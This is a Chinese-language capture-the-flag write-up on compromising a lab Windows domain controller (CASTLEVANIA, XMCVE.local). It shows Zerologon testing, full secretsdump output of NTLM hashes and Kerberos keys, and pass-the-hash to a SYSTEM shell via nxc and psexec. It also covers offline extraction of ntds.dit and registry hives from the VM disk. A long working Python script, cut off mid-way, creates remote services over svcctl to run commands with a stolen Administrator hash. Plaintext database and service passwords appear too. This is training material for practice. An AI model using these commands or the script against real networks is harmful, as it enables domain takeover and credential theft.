1001:$sntp-ms$cc55305a19f98b32c9531c0c6ee10342$1c0111e90000 0000000a02c44c4f434ced7257d9052ad312e1b8428bffbfcd0aed725b7 ebd3b0666ed725b7ebd3b47d4

zerologon

简单看了下没有匿名端⼝，时钟烘焙破解不出，web没信息，开始查看历史漏洞，发现存在CVE2020 1472，我感觉是⾮预期解。要不然真的有点太简单了，不过确实拿下了

1
└─$ python3 zerologon_tester.py CASTLEVANIA $ip Performing authentication attempts...
2
===========================================================
3
===========================================================
4
===== Success! DC can be fully compromised by a Zerologon attack.
5
nxc smb $ip  -u '' -p '' -M zerologon SMB         10.200.26.154   445    CASTLEVANIA      [*] Win dows 10 / Server 2019 Build 17763 x64 (name:CASTLEVANIA) (d omain:XMCVE.local) (signing:True) (SMBv1:False) SMB         10.200.26.154   445    CASTLEVANIA      [-] XMCVE.local\: STATUS_ACCESS_DENIED
6
ZEROLOGON   10.200.26.154   445    CASTLEVANIA      VULNERA
7
BLE ZEROLOGON   10.200.26.154   445    CASTLEVANIA      Next st ep: https://github.com/dirkjanm/CVE-2020-1472 直接dumphash

secretsdump

1
└─$ impacket-secretsdump -no-pass -just-dc CASTLEVANIA\$@$i p
2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
3
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthas h)
4
[*] Using the DRSUAPI method to get NTDS.DIT secrets
5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831 271e229dbc6e712097b63168:::
6
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c 576b4b3aeef4730a8:::
8
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e2 29dbc6e712097b63168::: XMCVE.local\p2zhh:1104:aad3b435b51404eeaad3b435b51404ee:bc2 bf43119e258bcecf71d44abc29db7::: XMCVE.local\mowen:1105:aad3b435b51404eeaad3b435b51404ee:efb 5fa49a38497a71e144f690860688e:::
9
XMCVE.local\sales:1106:aad3b435b51404eeaad3b435b51404ee:2b5 76acbe6bcfda7294d6bd18041b8fe::: XMCVE.local\support:1107:aad3b435b51404eeaad3b435b51404ee:2 b576acbe6bcfda7294d6bd18041b8fe::: XMCVE.local\it:1108:aad3b435b51404eeaad3b435b51404ee:2b576a cbe6bcfda7294d6bd18041b8fe::: XMCVE.local\hr:1109:aad3b435b51404eeaad3b435b51404ee:2b576a cbe6bcfda7294d6bd18041b8fe::: XMCVE.local\admin:1110:aad3b435b51404eeaad3b435b51404ee:2b5 76acbe6bcfda7294d6bd18041b8fe:::
10
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d9 3ef04edb808c5bce3a5bd67b936ca9::: CASTLEVANIA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54e b4b40e2ca21b2fcb3e6298969d741fc6e70a9367786 Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a8
11
3b2d9b4439c Administrator:des-cbc-md5:80584683e63d5845 krbtgt:aes256-cts-hmac-sha1-96:2392ad160e585e1448c5ca4623b9 ad48789c267c6488a0074dd86e98457fb5fc krbtgt:aes128-cts-hmac-sha1-96:7d55d129c8fe6c50aa87cb542775 f0a0
12
krbtgt:des-cbc-md5:e570376eb538c132 Alucard:aes256-cts-hmac-sha1-96:638ca0d75cc190cb5e378f1763d cb62c86e72b88c3daea8b4fbe22071cfe38c2 Alucard:aes128-cts-hmac-sha1-96:af36315453c02abbe2c811ee7fd c5b56Alucard:des-cbc-md5:585e80b09b6eb561
13
XMCVE.local\p2zhh:aes256-cts-hmac-sha1-96:ded2395cf838fe474
14
403b924638ba43ab5bf6f86f6924a172f42158f89523f58
15
XMCVE.local\p2zhh:aes128-cts-hmac-sha1-96:a8bf626e448308048
16
849c8c607846308
17
XMCVE.local\p2zhh:des-cbc-md5:386df4e008e96813
18
XMCVE.local\mowen:aes256-cts-hmac-sha1-96:15163711bf2b1f9b5
19
292a92e92b04a5985e1cb4af3f39c02eec442acf69f8268
20
XMCVE.local\mowen:aes128-cts-hmac-sha1-96:fab8fe129984295f1
21
8a99dcf365e654c
22
XMCVE.local\mowen:des-cbc-md5:231c7a2a3708029d
23
XMCVE.local\sales:aes256-cts-hmac-sha1-96:16ca24589ae3946d2
24
703f01517ce6690ba5f047caee666ac1d8fb080818b38d9
25
XMCVE.local\sales:aes128-cts-hmac-sha1-96:b89a5e96aa7076406
26
58d8cd44346d373
27
XMCVE.local\sales:des-cbc-md5:735125852ad66dd6 XMCVE.local\support:aes256-cts-hmac-sha1-96:18b8e74980ad358 e873dd99697c2e03c45cba28d44fda669cb311228fce34f74 XMCVE.local\support:aes128-cts-hmac-sha1-96:ec7850f423890ba
28
5c01a4968e18916f9
29
XMCVE.local\support:des-cbc-md5:389bfee35e4f7620
30
XMCVE.local\it:aes256-cts-hmac-sha1-96:9a449caeff406780cd9d
31
064fd51524df50eae35fcef19915a0ac5dfbd2afdaaf XMCVE.local\it:aes128-cts-hmac-sha1-96:53ec1190fb189b97c666 c2dc199a1132 XMCVE.local\it:des-cbc-md5:1c2686548a9d4a16
32
XMCVE.local\hr:aes256-cts-hmac-sha1-96:de4a4f2a15ef2a47f055
33
791f5042a376090cee935dd1907f6efd8ca3bd4e8fa4 XMCVE.local\hr:aes128-cts-hmac-sha1-96:6bafbe4835641707bf1e a4f16510e016 XMCVE.local\hr:des-cbc-md5:ce9113948c738913
34
XMCVE.local\admin:aes256-cts-hmac-sha1-96:2e64fb40f4b6b9d9c
35
280f7ff87a7f2c37167d53d28352684b2fd53cd3d9c135a
36
XMCVE.local\admin:aes128-cts-hmac-sha1-96:741a205f3dbe24d95
37
9f2ced9e7cfea8b
38
XMCVE.local\admin:des-cbc-md5:49d9c74562bca1ce XMCVE.local\sqlsvc:aes256-cts-hmac-sha1-96:908e3dfe7822951c c25e6639a69a568708050cca32159836d83f977d982874feXMCVE.local\sqlsvc:aes128-cts-hmac-sha1-96:adbd4b00d8ac0d8d
39
4f0b0f5a7ee3999b
40
XMCVE.local\sqlsvc:des-cbc-md5:e9a292087902f10d CASTLEVANIA$:aes256-cts-hmac-sha1-96:fc320757aa82369c8e3e68 a68b43f1afc78f1c8f4c86a08a9c11cd822cbce051 CASTLEVANIA$:aes128-cts-hmac-sha1-96:bdfe62da40fc7daf73f4ab d6549e431a CASTLEVANIA$:des-cbc-md5:375162a731320467

nxc

1
└─$ nxc smb $ip -u Administrator -H d94f9831271e229dbc6e712097b63168
2
SMB         10.200.26.154   445    CASTLEVANIA      [*] Win dows 10 / Server 2019 Build 17763 x64 (name:CASTLEVANIA) (domin:XMCVE.local) (signing:True) (SMBv1:False)
3
SMB         10.200.26.154   445    CASTLEVANIA      [+] XMC VE.local\Administrator:d94f9831271e229dbc6e712097b63168 (Pwn3d!)

psexec

1
└─$ impacket-psexec "XMCVE.local/administrator@$ip" -hashes :d94f9831271e229dbc6e712097b63168 -no-pass
2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
3
[*] Requesting shares on 10.200.26.154.....
4
[*] Found writable share ADMIN$
5
[*] Uploading file LxghSxwo.exe [*] Opening SVCManager on 10.200.26.154.....
6
[*] Creating service hrnm on 10.200.26.154.....
7
[*] Starting service hrnm.....
8
[!] Press help for extra shell commands
9
Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation????????
10
C:\Windows\system32> so fucking ez'so' is not recognized as an internal or external command, operable program or batch file.

ai幻神之力（本地挂载）

详细复现过程

1. 本地搭建

题目附件是整机镜像 Bloodstained.ova。本地没有直接可用的官方 VirtualBox 7.2.0 图形界面环境，所以我直接用 VBoxManage.exe 做手工导入和挂盘。

实际跑通时使用到的关键环境如下：

C:\Program Files\ldplayer9box\VBoxManage.exe
D:\Python\Python311\python.exe
D:\Python\Python311\Scripts\secretsdump.py
wsl.exe -d kali-linux

处理方式不是直接 VBoxManage import，而是：

从 Bloodstained.ova 解出 Bloodstained.ovf 和 Bloodstained 1-disk001.vmdk
把 streamOptimized 的 VMDK 转成可直接挂载的 VDI
手工创建 Windows2019_64 虚拟机并挂盘
配置 NAT 端口转发

端口转发实际使用的是：

1
127.0.0.1:18080 -> 80
2
127.0.0.1:10389 -> 389
3
127.0.0.1:11433 -> 1433
4
127.0.0.1:10445 -> 445

虚拟机启动后，确认到：

主机名：CASTLEVANIA
域名：XMCVE.local

2. 在线确认与离线取证

先做最小在线确认：

Web 首页在 http://127.0.0.1:18080/
LDAP RootDSE 匿名可读
defaultNamingContext: DC=XMCVE,DC=local
dnsHostName: CASTLEVANIA.XMCVE.local

随后改走离线链路，从 VMDK 里直接导出关键文件：

/Windows/NTDS/ntds.dit
/Windows/System32/config/SYSTEM
/Windows/System32/config/SECURITY
/inetpub/wwwroot

站点目录里还可以看到一个明文连接文件 poo_connection.txt：

1
server=localhost;
2
user=wuwupor;
3
password=lovlyBaby
4
database=master

这说明题目环境里确实存在 IIS + MSSQL，但这组数据库凭据本身不是最后拿管理员 shell 的关键。

3. 离线导出域控凭据

对离线导出的三件套执行：

1
python secretsdump.py -system offline/hives/SYSTEM \
2
  -security offline/hives/SECURITY \
3
  -ntds offline/hives/ntds.dit LOCAL

得到两个关键结果：

一是 LSA Secret 里有 MSSQL 服务口令：

1
_SC_MSSQLSERVER
2
(Unknown User):Sql!2026

二是直接解出了域控账号哈希，其中最关键的是：

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
2
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
3
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d93ef04edb808c5bce3a5bd67b936ca9:::

这里 Administrator 的 NTLM 为：

d94f9831271e229dbc6e712097b63168

4. 拿管理员 shell

最终没有再依赖单独的 psexec_anyport.py。现在的做法是把远程执行逻辑直接写进一个单文件脚本里：

从 artifacts_secretsdump.txt 自动提取 Administrator 哈希
连接 127.0.0.1:10445
通过 svcctl 创建临时服务
用 cmd.exe 落一个临时 .bat
执行 whoami 和 hostname
从 ADMIN$\\Temp\\ 把输出回读回来

实测输出为：

1
whoami    -> nt authority\system
2
hostname  -> CASTLEVANIA

这说明已经在目标域控上拿到了 NT AUTHORITY\SYSTEM 级别的命令执行，满足“拿到 Administrator shell”的要求。

5. 一键脚本说明

现在只保留一份主脚本：

babydc_unified.py

它包含两个入口：

1
python .\babydc_unified.py full
2
python .\babydc_unified.py verify

含义分别是：

full：从当前目录里的 Bloodstained.ova 出发，完成虚拟机准备、离线导出、secretsdump、管理员权限验证
verify：如果 artifacts_secretsdump.txt 已经存在，只做管理员 shell 校验

我实际跑通的命令是：

1
D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe verify
2
D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe full

其中 full 模式在虚拟机刚启动时，域控服务有一个短暂的未就绪窗口，所以脚本里加入了自动重试。实测会在若干次 STATUS_LOGON_FAILURE 之后继续跑通，这属于正常现象。

一键可复现代码

当前最终版脚本全文如下，直接保存为 babydc_unified.py 即可使用：

1
import argparse
2
import os
3
import random
4
import re
5
import shutil
6
import string
7
import subprocess
8
import sys
9
import time
10
from pathlib import Path
11

12
from impacket.dcerpc.v5 import scmr, transport
13

14

15
ROOT = Path(__file__).resolve().parent
16
VM_NAME = "Bloodstained"
17
DEFAULT_OVA = ROOT / "Bloodstained.ova"
18
DEFAULT_OVF = ROOT / "Bloodstained.ovf"
19
DEFAULT_VMDK = ROOT / "Bloodstained 1-disk001.vmdk"
20
DEFAULT_VM_DIR = ROOT / "vm" / VM_NAME
21
DEFAULT_VDI = DEFAULT_VM_DIR / f"{VM_NAME}.vdi"
22
DEFAULT_VBOX_HOME = ROOT / ".vboxhome"
23
DEFAULT_OFFLINE_DIR = ROOT / "offline" / "hives"
24
DEFAULT_DUMP = ROOT / "artifacts_secretsdump.txt"
25
DEFAULT_WHOAMI = ROOT / "artifacts_system_whoami.txt"
26
DEFAULT_HOSTNAME = ROOT / "artifacts_system_hostname.txt"
27

28

29
def run_command(args, *, cwd=None, env=None, check=True, capture=True):
30
    proc = subprocess.run(
31
        args,
32
        cwd=cwd,
33
        env=env,
34
        check=False,
35
        capture_output=capture,
36
        text=True,
37
        encoding="utf-8",
38
        errors="backslashreplace",
39
    )
40
    if check and proc.returncode != 0:
41
        details = proc.stdout
42
        if proc.stderr:
43
            details = f"{details}\n{proc.stderr}" if details else proc.stderr
44
        raise RuntimeError(f"command failed ({proc.returncode}): {' '.join(map(str, args))}\n{details}".rstrip())
45
    return proc
46

47

48
def ensure_exists(path: Path, hint: str) -> None:
49
    if not path.exists():
50
        raise RuntimeError(f"missing required file: {path}\n{hint}")
51

52

53
def find_vboxmanage() -> Path:
54
    candidates = [
55
        Path(r"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe"),
56
        Path(r"C:\Program Files\ldplayer9box\VBoxManage.exe"),
57
    ]
58
    for candidate in candidates:
59
        if candidate.exists():
60
            return candidate
61
    found = shutil.which("VBoxManage.exe") or shutil.which("VBoxManage")
62
    if found:
63
        return Path(found)
64
    raise RuntimeError("VBoxManage.exe not found. Install VirtualBox 7.2.0 or adjust PATH.")
65

66

67
def find_wsl() -> Path:
68
    found = shutil.which("wsl.exe")
69
    if not found:
70
        raise RuntimeError("wsl.exe not found. WSL with kali-linux is required for virt-copy-out.")
71
    return Path(found)
72

73

74
def find_secretsdump(default_python: Path) -> Path:
75
    candidates = [
76
        default_python.parent / "Scripts" / "secretsdump.py",
77
        Path(r"D:\Python\Python311\Scripts\secretsdump.py"),
78
    ]
79
    for candidate in candidates:
80
        if candidate.exists():
81
            return candidate
82
    raise RuntimeError("secretsdump.py not found. Install impacket for the Python interpreter you will use.")
83

84

85
def vbox(vboxmanage: Path, vbox_home: Path, *args: str) -> subprocess.CompletedProcess:
86
    env = os.environ.copy()
87
    env["VBOX_USER_HOME"] = str(vbox_home)
88
    return run_command([str(vboxmanage), *args], env=env)
89

90

91
def convert_to_wsl_path(path: Path) -> str:
92
    full = path.resolve()
93
    drive = full.drive[:1].lower()
94
    rest = full.as_posix()[2:]
95
    return f"/mnt/{drive}{rest}"
96

97

98
def ensure_ova_extracted(ova: Path, ovf: Path, vmdk: Path) -> None:
99
    ensure_exists(ova, "Place the challenge OVA in the current directory.")
100
    if ovf.exists() and vmdk.exists():
101
        return
102
    run_command(["tar", "-xf", str(ova), ovf.name, vmdk.name], cwd=ova.parent)
103

104

105
def ensure_vdi(vboxmanage: Path, vmdk: Path, vdi: Path) -> None:
106
    if vdi.exists():
107
        return
108
    vdi.parent.mkdir(parents=True, exist_ok=True)
109
    run_command([str(vboxmanage), "clonemedium", "disk", str(vmdk), str(vdi), "--format", "VDI"])
110

111

112
def ensure_vm_registered(vboxmanage: Path, vbox_home: Path, vm_dir: Path, vdi: Path) -> None:
113
    vm_dir.mkdir(parents=True, exist_ok=True)
114
    vbox_home.mkdir(parents=True, exist_ok=True)
115
    vbox(vboxmanage, vbox_home, "list", "systemproperties")
116
    vm_list = vbox(vboxmanage, vbox_home, "list", "vms").stdout
117
    vmx = vm_dir / f"{VM_NAME}.vbox"
118
    if f'"{VM_NAME}"' not in vm_list:
119
        if vmx.exists():
120
            vbox(vboxmanage, vbox_home, "registervm", str(vmx))
121
        else:
122
            vbox(vboxmanage, vbox_home, "createvm", "--name", VM_NAME, "--basefolder", str(ROOT / "vm"), "--ostype", "Windows2019_64", "--register")
123
            vbox(
124
                vboxmanage,
125
                vbox_home,
126
                "modifyvm",
127
                VM_NAME,
128
                "--memory",
129
                "2048",
130
                "--cpus",
131
                "1",
132
                "--firmware",
133
                "bios",
134
                "--ioapic",
135
                "on",
136
                "--pae",
137
                "off",
138
                "--vram",
139
                "128",
140
                "--graphicscontroller",
141
                "vboxsvga",
142
                "--boot1",
143
                "disk",
144
                "--boot2",
145
                "dvd",
146
                "--boot3",
147
                "none",
148
                "--boot4",
149
                "none",
150
                "--audio",
151
                "none",
152
            )
153
            vbox(vboxmanage, vbox_home, "storagectl", VM_NAME, "--name", "SATA", "--add", "sata", "--controller", "IntelAhci")
154

155
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
156
    if '"SATA-0-0"="none"' in info:
157
        vbox(
158
            vboxmanage,
159
            vbox_home,
160
            "storageattach",
161
            VM_NAME,
162
            "--storagectl",
163
            "SATA",
164
            "--port",
165
            "0",
166
            "--device",
167
            "0",
168
            "--type",
169
            "hdd",
170
            "--medium",
171
            str(vdi),
172
        )
173

174

175
def ensure_nat_rules(vboxmanage: Path, vbox_home: Path) -> None:
176
    forwards = [
177
        "http,tcp,127.0.0.1,18080,,80",
178
        "ldap,tcp,127.0.0.1,10389,,389",
179
        "mssql,tcp,127.0.0.1,11433,,1433",
180
        "smb,tcp,127.0.0.1,10445,,445",
181
    ]
182
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
183
    for rule in forwards:
184
        name = rule.split(",", 1)[0]
185
        pattern = re.compile(rf'^Forwarding\(\d+\)="{re.escape(name)},', re.MULTILINE)
186
        if not pattern.search(info):
187
            vbox(vboxmanage, vbox_home, "modifyvm", VM_NAME, "--natpf1", rule)
188

189

190
def get_vm_state(vboxmanage: Path, vbox_home: Path) -> str:
191
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
192
    match = re.search(r'^VMState="([^"]+)"$', info, re.MULTILINE)
193
    return match.group(1) if match else "unknown"
194

195

196
def restart_vm(vboxmanage: Path, vbox_home: Path, boot_wait: int) -> None:
197
    state = get_vm_state(vboxmanage, vbox_home)
198
    if state == "running":
199
        vbox(vboxmanage, vbox_home, "controlvm", VM_NAME, "poweroff")
200
        time.sleep(3)
201
    vbox(vboxmanage, vbox_home, "startvm", VM_NAME, "--type", "headless")
202
    time.sleep(boot_wait)
203

204

205
def copy_offline_hives(wsl_exe: Path, work_root: Path, offline_dir: Path, distro: str, vmdk: Path) -> None:
206
    offline_dir.mkdir(parents=True, exist_ok=True)
207
    wsl_root = convert_to_wsl_path(work_root)
208
    wsl_vmdk = convert_to_wsl_path(vmdk)
209
    script = "\n".join(
210
        [
211
            "set -e",
212
            f"cd '{wsl_root}'",
213
            "mkdir -p offline/hives",
214
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/NTDS/ntds.dit offline/hives/",
215
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SYSTEM offline/hives/",
216
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SECURITY offline/hives/",
217
        ]
218
    )
219
    run_command([str(wsl_exe), "-u", "root", "-d", distro, "--", "bash", "-lc", script])
220

221

222
def run_secretsdump(python_exe: Path, secretsdump: Path, offline_dir: Path, dump_path: Path) -> None:
223
    system_hive = offline_dir / "SYSTEM"
224
    security_hive = offline_dir / "SECURITY"
225
    ntds = offline_dir / "ntds.dit"
226
    ensure_exists(system_hive, "Offline SYSTEM hive is required.")
227
    ensure_exists(security_hive, "Offline SECURITY hive is required.")
228
    ensure_exists(ntds, "Offline NTDS.dit is required.")
229
    proc = run_command(
230
        [
231
            str(python_exe),
232
            str(secretsdump),
233
            "-system",
234
            str(system_hive),
235
            "-security",
236
            str(security_hive),
237
            "-ntds",
238
            str(ntds),
239
            "LOCAL",
240
        ]
241
    )
242
    dump_path.write_text(proc.stdout, encoding="utf-8")
243

244

245
def read_text_auto(path: Path) -> str:
246
    raw = path.read_bytes()
247
    for encoding in ("utf-8", "utf-16", "utf-16-le", "utf-16-be", "gbk"):
248
        try:
249
            return raw.decode(encoding)
250
        except UnicodeDecodeError:
251
            continue
252
    return raw.decode("utf-8", errors="ignore")
253

254

255
def extract_hash_line(dump_path: Path, account: str) -> str:
256
    pattern = re.compile(rf"{re.escape(account)}:\d+:[0-9a-fA-F]{{32}}:[0-9a-fA-F]{{32}}:::")
257
    for line in read_text_auto(dump_path).splitlines():
258
        match = pattern.search(line)
259
        if match:
260
            return match.group(0)
261
    raise RuntimeError(f"could not find hash line for {account} in {dump_path}")
262

263

264
def parse_hash_line(hash_line: str) -> tuple[str, str]:
265
    parts = hash_line.strip().split(":")
266
    if len(parts) < 4:
267
        raise RuntimeError(f"invalid hash line: {hash_line}")
268
    return parts[2], parts[3]
269

270

271
def random_tag(prefix: str, length: int = 8) -> str:
272
    return prefix + "".join(random.choice(string.ascii_letters) for _ in range(length))
273

274

275
def escape_for_cmd_echo(command: str) -> str:
276
    replacements = {
277
        "^": "^^",
278
        "&": "^&",
279
        "<": "^<",
280
        ">": "^>",
281
        "|": "^|",
282
    }
283
    escaped = []
284
    for char in command:
285
        escaped.append(replacements.get(char, char))
286
    return "".join(escaped)
287

288

289
def smbexec_one_shot(
290
    *,
291
    target_name: str,
292
    target_ip: str,
293
    smb_port: int,
294
    domain: str,
295
    username: str,
296
    password: str,
297
    lmhash: str,
298
    nthash: str,
299
    command: str,
300
) -> str:
301
    stringbinding = rf"ncacn_np:{target_name}[\pipe\svcctl]"
302
    rpc_transport = transport.DCERPCTransportFactory(stringbinding)
303
    rpc_transport.setRemoteHost(target_ip)
304
    rpc_transport.set_dport(smb_port)
305
    rpc_transport.set_credentials(username, password, domain, lmhash, nthash, None)
306

307
    dce = rpc_transport.get_dce_rpc()
308
    dce.connect()
309
    dce.bind(scmr.MSRPC_UUID_SCMR)
310

311
    smb_conn = rpc_transport.get_smb_connection()
312
    smb_conn.setTimeout(100000)
313

314
    scm_handle = scmr.hROpenSCManagerW(dce)["lpScHandle"]
315
    service_name = random_tag("svc")
316
    output_name = random_tag("out") + ".txt"
317
    batch_name = random_tag("job") + ".bat"
318
    output_path = rf"C:\Windows\Temp\{output_name}"
319
    batch_path = rf"C:\Windows\Temp\{batch_name}"
320
    batch_body = f"{escape_for_cmd_echo(command)} ^> {output_path} 2^>^&1"
321
    binary_path = (
322
        rf"C:\Windows\System32\cmd.exe /Q /c "
323
        rf"echo {batch_body} > {batch_path} & "
324
        rf"C:\Windows\System32\cmd.exe /Q /c {batch_path} & "
325
        rf"del {batch_path}"
326
    )
327

328
    service_handle = None
329
    try:
330
        resp = scmr.hRCreateServiceW(
331
            dce,
332
            scm_handle,
333
            service_name,
334
            service_name,
335
            lpBinaryPathName=binary_path,
336
            dwStartType=scmr.SERVICE_DEMAND_START,
337
        )
338
        service_handle = resp["lpServiceHandle"]
339
        try:
340
            scmr.hRStartServiceW(dce, service_handle)
341
        except Exception:
342
            pass
343

344
        time.sleep(1)
345

346
        last_error = None
347
        for _ in range(30):
348
            try:
349
                chunks = []
350

351
                def callback(data: bytes) -> None:
352
                    chunks.append(data)
353

354
                smb_conn.getFile("ADMIN$", rf"Temp\{output_name}", callback)
355
                output = b"".join(chunks).decode("utf-8", errors="backslashreplace")
356
                if output.strip():
357
                    smb_conn.deleteFile("ADMIN$", rf"Temp\{output_name}")
358
                    return output
359
            except Exception as exc:
360
                last_error = exc
361
            time.sleep(1)
362
        raise RuntimeError(f"timed out waiting for remote output file {output_name}: {last_error}")
363
    finally:
364
        if service_handle is not None:
365
            try:
366
                scmr.hRDeleteService(dce, service_handle)
367
            except Exception:
368
                pass
369
            try:
370
                scmr.hRCloseServiceHandle(dce, service_handle)
371
            except Exception:
372
                pass
373
        try:
374
            scmr.hRCloseServiceHandle(dce, scm_handle)
375
        except Exception:
376
            pass
377
        try:
378
            dce.disconnect()
379
        except Exception:
380
            pass
381

382

383
def extract_proof(output: str, command: str) -> str:
384
    cleaned = re.sub(r"[\x00-\x08\x0b-\x1f]", "", output)
385
    if command == "whoami":
386
        match = re.search(r"(?im)^\s*(nt authority\\system)\s*$", cleaned)
387
    elif command == "hostname":
388
        match = re.search(r"(?im)^\s*(CASTLEVANIA)\s*$", cleaned)
389
    else:
390
        match = None
391
    if not match:
392
        raise RuntimeError(f"failed to extract proof line for {command}")
393
    return match.group(1)
394

395

396
def verify_shell(
397
    *,
398
    dump_path: Path,
399
    hash_line: str | None,
400
    domain: str,
401
    username: str,
402
    target_name: str,
403
    target_ip: str,
404
    smb_port: int,
405
    whoami_path: Path,
406
    hostname_path: Path,
407
    retries: int,
408
    retry_delay: int,
409
) -> tuple[str, str]:
410
    if not hash_line:
411
        ensure_exists(dump_path, "Run the full mode first or provide --hash-line.")
412
        hash_line = extract_hash_line(dump_path, username)
413

414
    lmhash, nthash = parse_hash_line(hash_line)
415
    identity = f"{domain}/{username}@{target_name}"
416
    print(f"[*] principal : {identity}")
417
    print(f"[*] target ip : {target_ip}:{smb_port}")
418
    print(f"[*] hashes    : {lmhash}:{nthash}")
419

420
    def run_with_retry(command: str) -> str:
421
        last_error = None
422
        for attempt in range(1, retries + 1):
423
            try:
424
                return smbexec_one_shot(
425
                    target_name=target_name,
426
                    target_ip=target_ip,
427
                    smb_port=smb_port,
428
                    domain=domain,
429
                    username=username,
430
                    password="",
431
                    lmhash=lmhash,
432
                    nthash=nthash,
433
                    command=command,
434
                )
435
            except Exception as exc:
436
                last_error = exc
437
                if attempt == retries:
438
                    break
439
                print(f"[*] retry {attempt}/{retries - 1} for {command}: {exc}")
440
                time.sleep(retry_delay)
441
        raise RuntimeError(f"{command} failed after {retries} attempts: {last_error}")
442

443
    whoami_output = run_with_retry("whoami")
444
    whoami_path.write_text(whoami_output, encoding="utf-8")
445
    whoami = extract_proof(whoami_output, "whoami")
446
    print(f"[+] whoami    : {whoami}")
447

448
    hostname_output = run_with_retry("hostname")
449
    hostname_path.write_text(hostname_output, encoding="utf-8")
450
    hostname = extract_proof(hostname_output, "hostname")
451
    print(f"[+] hostname  : {hostname}")
452

453
    return whoami, hostname
454

455

456
def do_full(args) -> int:
457
    python_exe = args.python.resolve()
458
    vboxmanage = args.vboxmanage.resolve() if args.vboxmanage else find_vboxmanage()
459
    wsl_exe = args.wsl.resolve() if args.wsl else find_wsl()
460
    secretsdump = args.secretsdump.resolve() if args.secretsdump else find_secretsdump(python_exe)
461

462
    ensure_exists(python_exe, "Use a Python interpreter with impacket installed.")
463

464
    args.vbox_home.mkdir(parents=True, exist_ok=True)
465
    args.offline_dir.mkdir(parents=True, exist_ok=True)
466
    (ROOT / "vm").mkdir(parents=True, exist_ok=True)
467

468
    print("[*] extracting OVA if needed")
469
    ensure_ova_extracted(args.ova, args.ovf, args.vmdk)
470

471
    print("[*] preparing VDI")
472
    ensure_vdi(vboxmanage, args.vmdk, args.vdi)
473

474
    print("[*] registering VM")
475
    ensure_vm_registered(vboxmanage, args.vbox_home, args.vm_dir, args.vdi)
476

477
    print("[*] setting NAT forwards")
478
    ensure_nat_rules(vboxmanage, args.vbox_home)
479

480
    print("[*] starting VM")
481
    restart_vm(vboxmanage, args.vbox_home, args.boot_wait)
482

483
    print("[*] copying offline hives from VMDK")
484
    copy_offline_hives(wsl_exe, ROOT, args.offline_dir, args.wsl_distro, args.vmdk)
485

486
    print("[*] running secretsdump")
487
    run_secretsdump(python_exe, secretsdump, args.offline_dir, args.dump)
488

489
    print("[*] verifying Administrator shell")
490
    whoami, hostname = verify_shell(
491
        dump_path=args.dump,
492
        hash_line=args.hash_line,
493
        domain=args.domain,
494
        username=args.user,
495
        target_name=args.target,
496
        target_ip=args.target_ip,
497
        smb_port=args.smb_port,
498
        whoami_path=args.whoami_out,
499
        hostname_path=args.hostname_out,
500
        retries=args.verify_retries,
501
        retry_delay=args.verify_delay,
502
    )
503
    print(f"[+] complete   : {whoami} @ {hostname}")
504
    return 0
505

506

507
def do_verify(args) -> int:
508
    print("[*] verifying Administrator shell")
509
    whoami, hostname = verify_shell(
510
        dump_path=args.dump,
511
        hash_line=args.hash_line,
512
        domain=args.domain,
513
        username=args.user,
514
        target_name=args.target,
515
        target_ip=args.target_ip,
516
        smb_port=args.smb_port,
517
        whoami_path=args.whoami_out,
518
        hostname_path=args.hostname_out,
519
        retries=args.verify_retries,
520
        retry_delay=args.verify_delay,
521
    )
522
    print(f"[+] complete   : {whoami} @ {hostname}")
523
    return 0
524

525

526
def build_parser() -> argparse.ArgumentParser:
527
    parser = argparse.ArgumentParser(description="One-file local reproduction script for BabyDC.")
528
    parser.add_argument("--python", type=Path, default=Path(sys.executable), help="Python interpreter with impacket installed")
529
    parser.add_argument("--domain", default="XMCVE.local")
530
    parser.add_argument("--user", default="Administrator")
531
    parser.add_argument("--target", default="CASTLEVANIA.XMCVE.local")
532
    parser.add_argument("--target-ip", default="127.0.0.1")
533
    parser.add_argument("--smb-port", type=int, default=10445)
534
    parser.add_argument("--dump", type=Path, default=DEFAULT_DUMP)
535
    parser.add_argument("--hash-line", help="Explicit secretsdump line, overrides --dump in verify mode")
536
    parser.add_argument("--whoami-out", type=Path, default=DEFAULT_WHOAMI)
537
    parser.add_argument("--hostname-out", type=Path, default=DEFAULT_HOSTNAME)
538
    parser.add_argument("--verify-retries", type=int, default=12, help="Retry count for post-boot shell validation")
539
    parser.add_argument("--verify-delay", type=int, default=5, help="Seconds between shell validation retries")
540

541
    subparsers = parser.add_subparsers(dest="mode", required=True)
542

543
    full = subparsers.add_parser("full", help="Extract the disk, boot the VM, dump hashes, and verify SYSTEM execution")
544
    full.add_argument("--ova", type=Path, default=DEFAULT_OVA)
545
    full.add_argument("--ovf", type=Path, default=DEFAULT_OVF)
546
    full.add_argument("--vmdk", type=Path, default=DEFAULT_VMDK)
547
    full.add_argument("--vm-dir", type=Path, default=DEFAULT_VM_DIR)
548
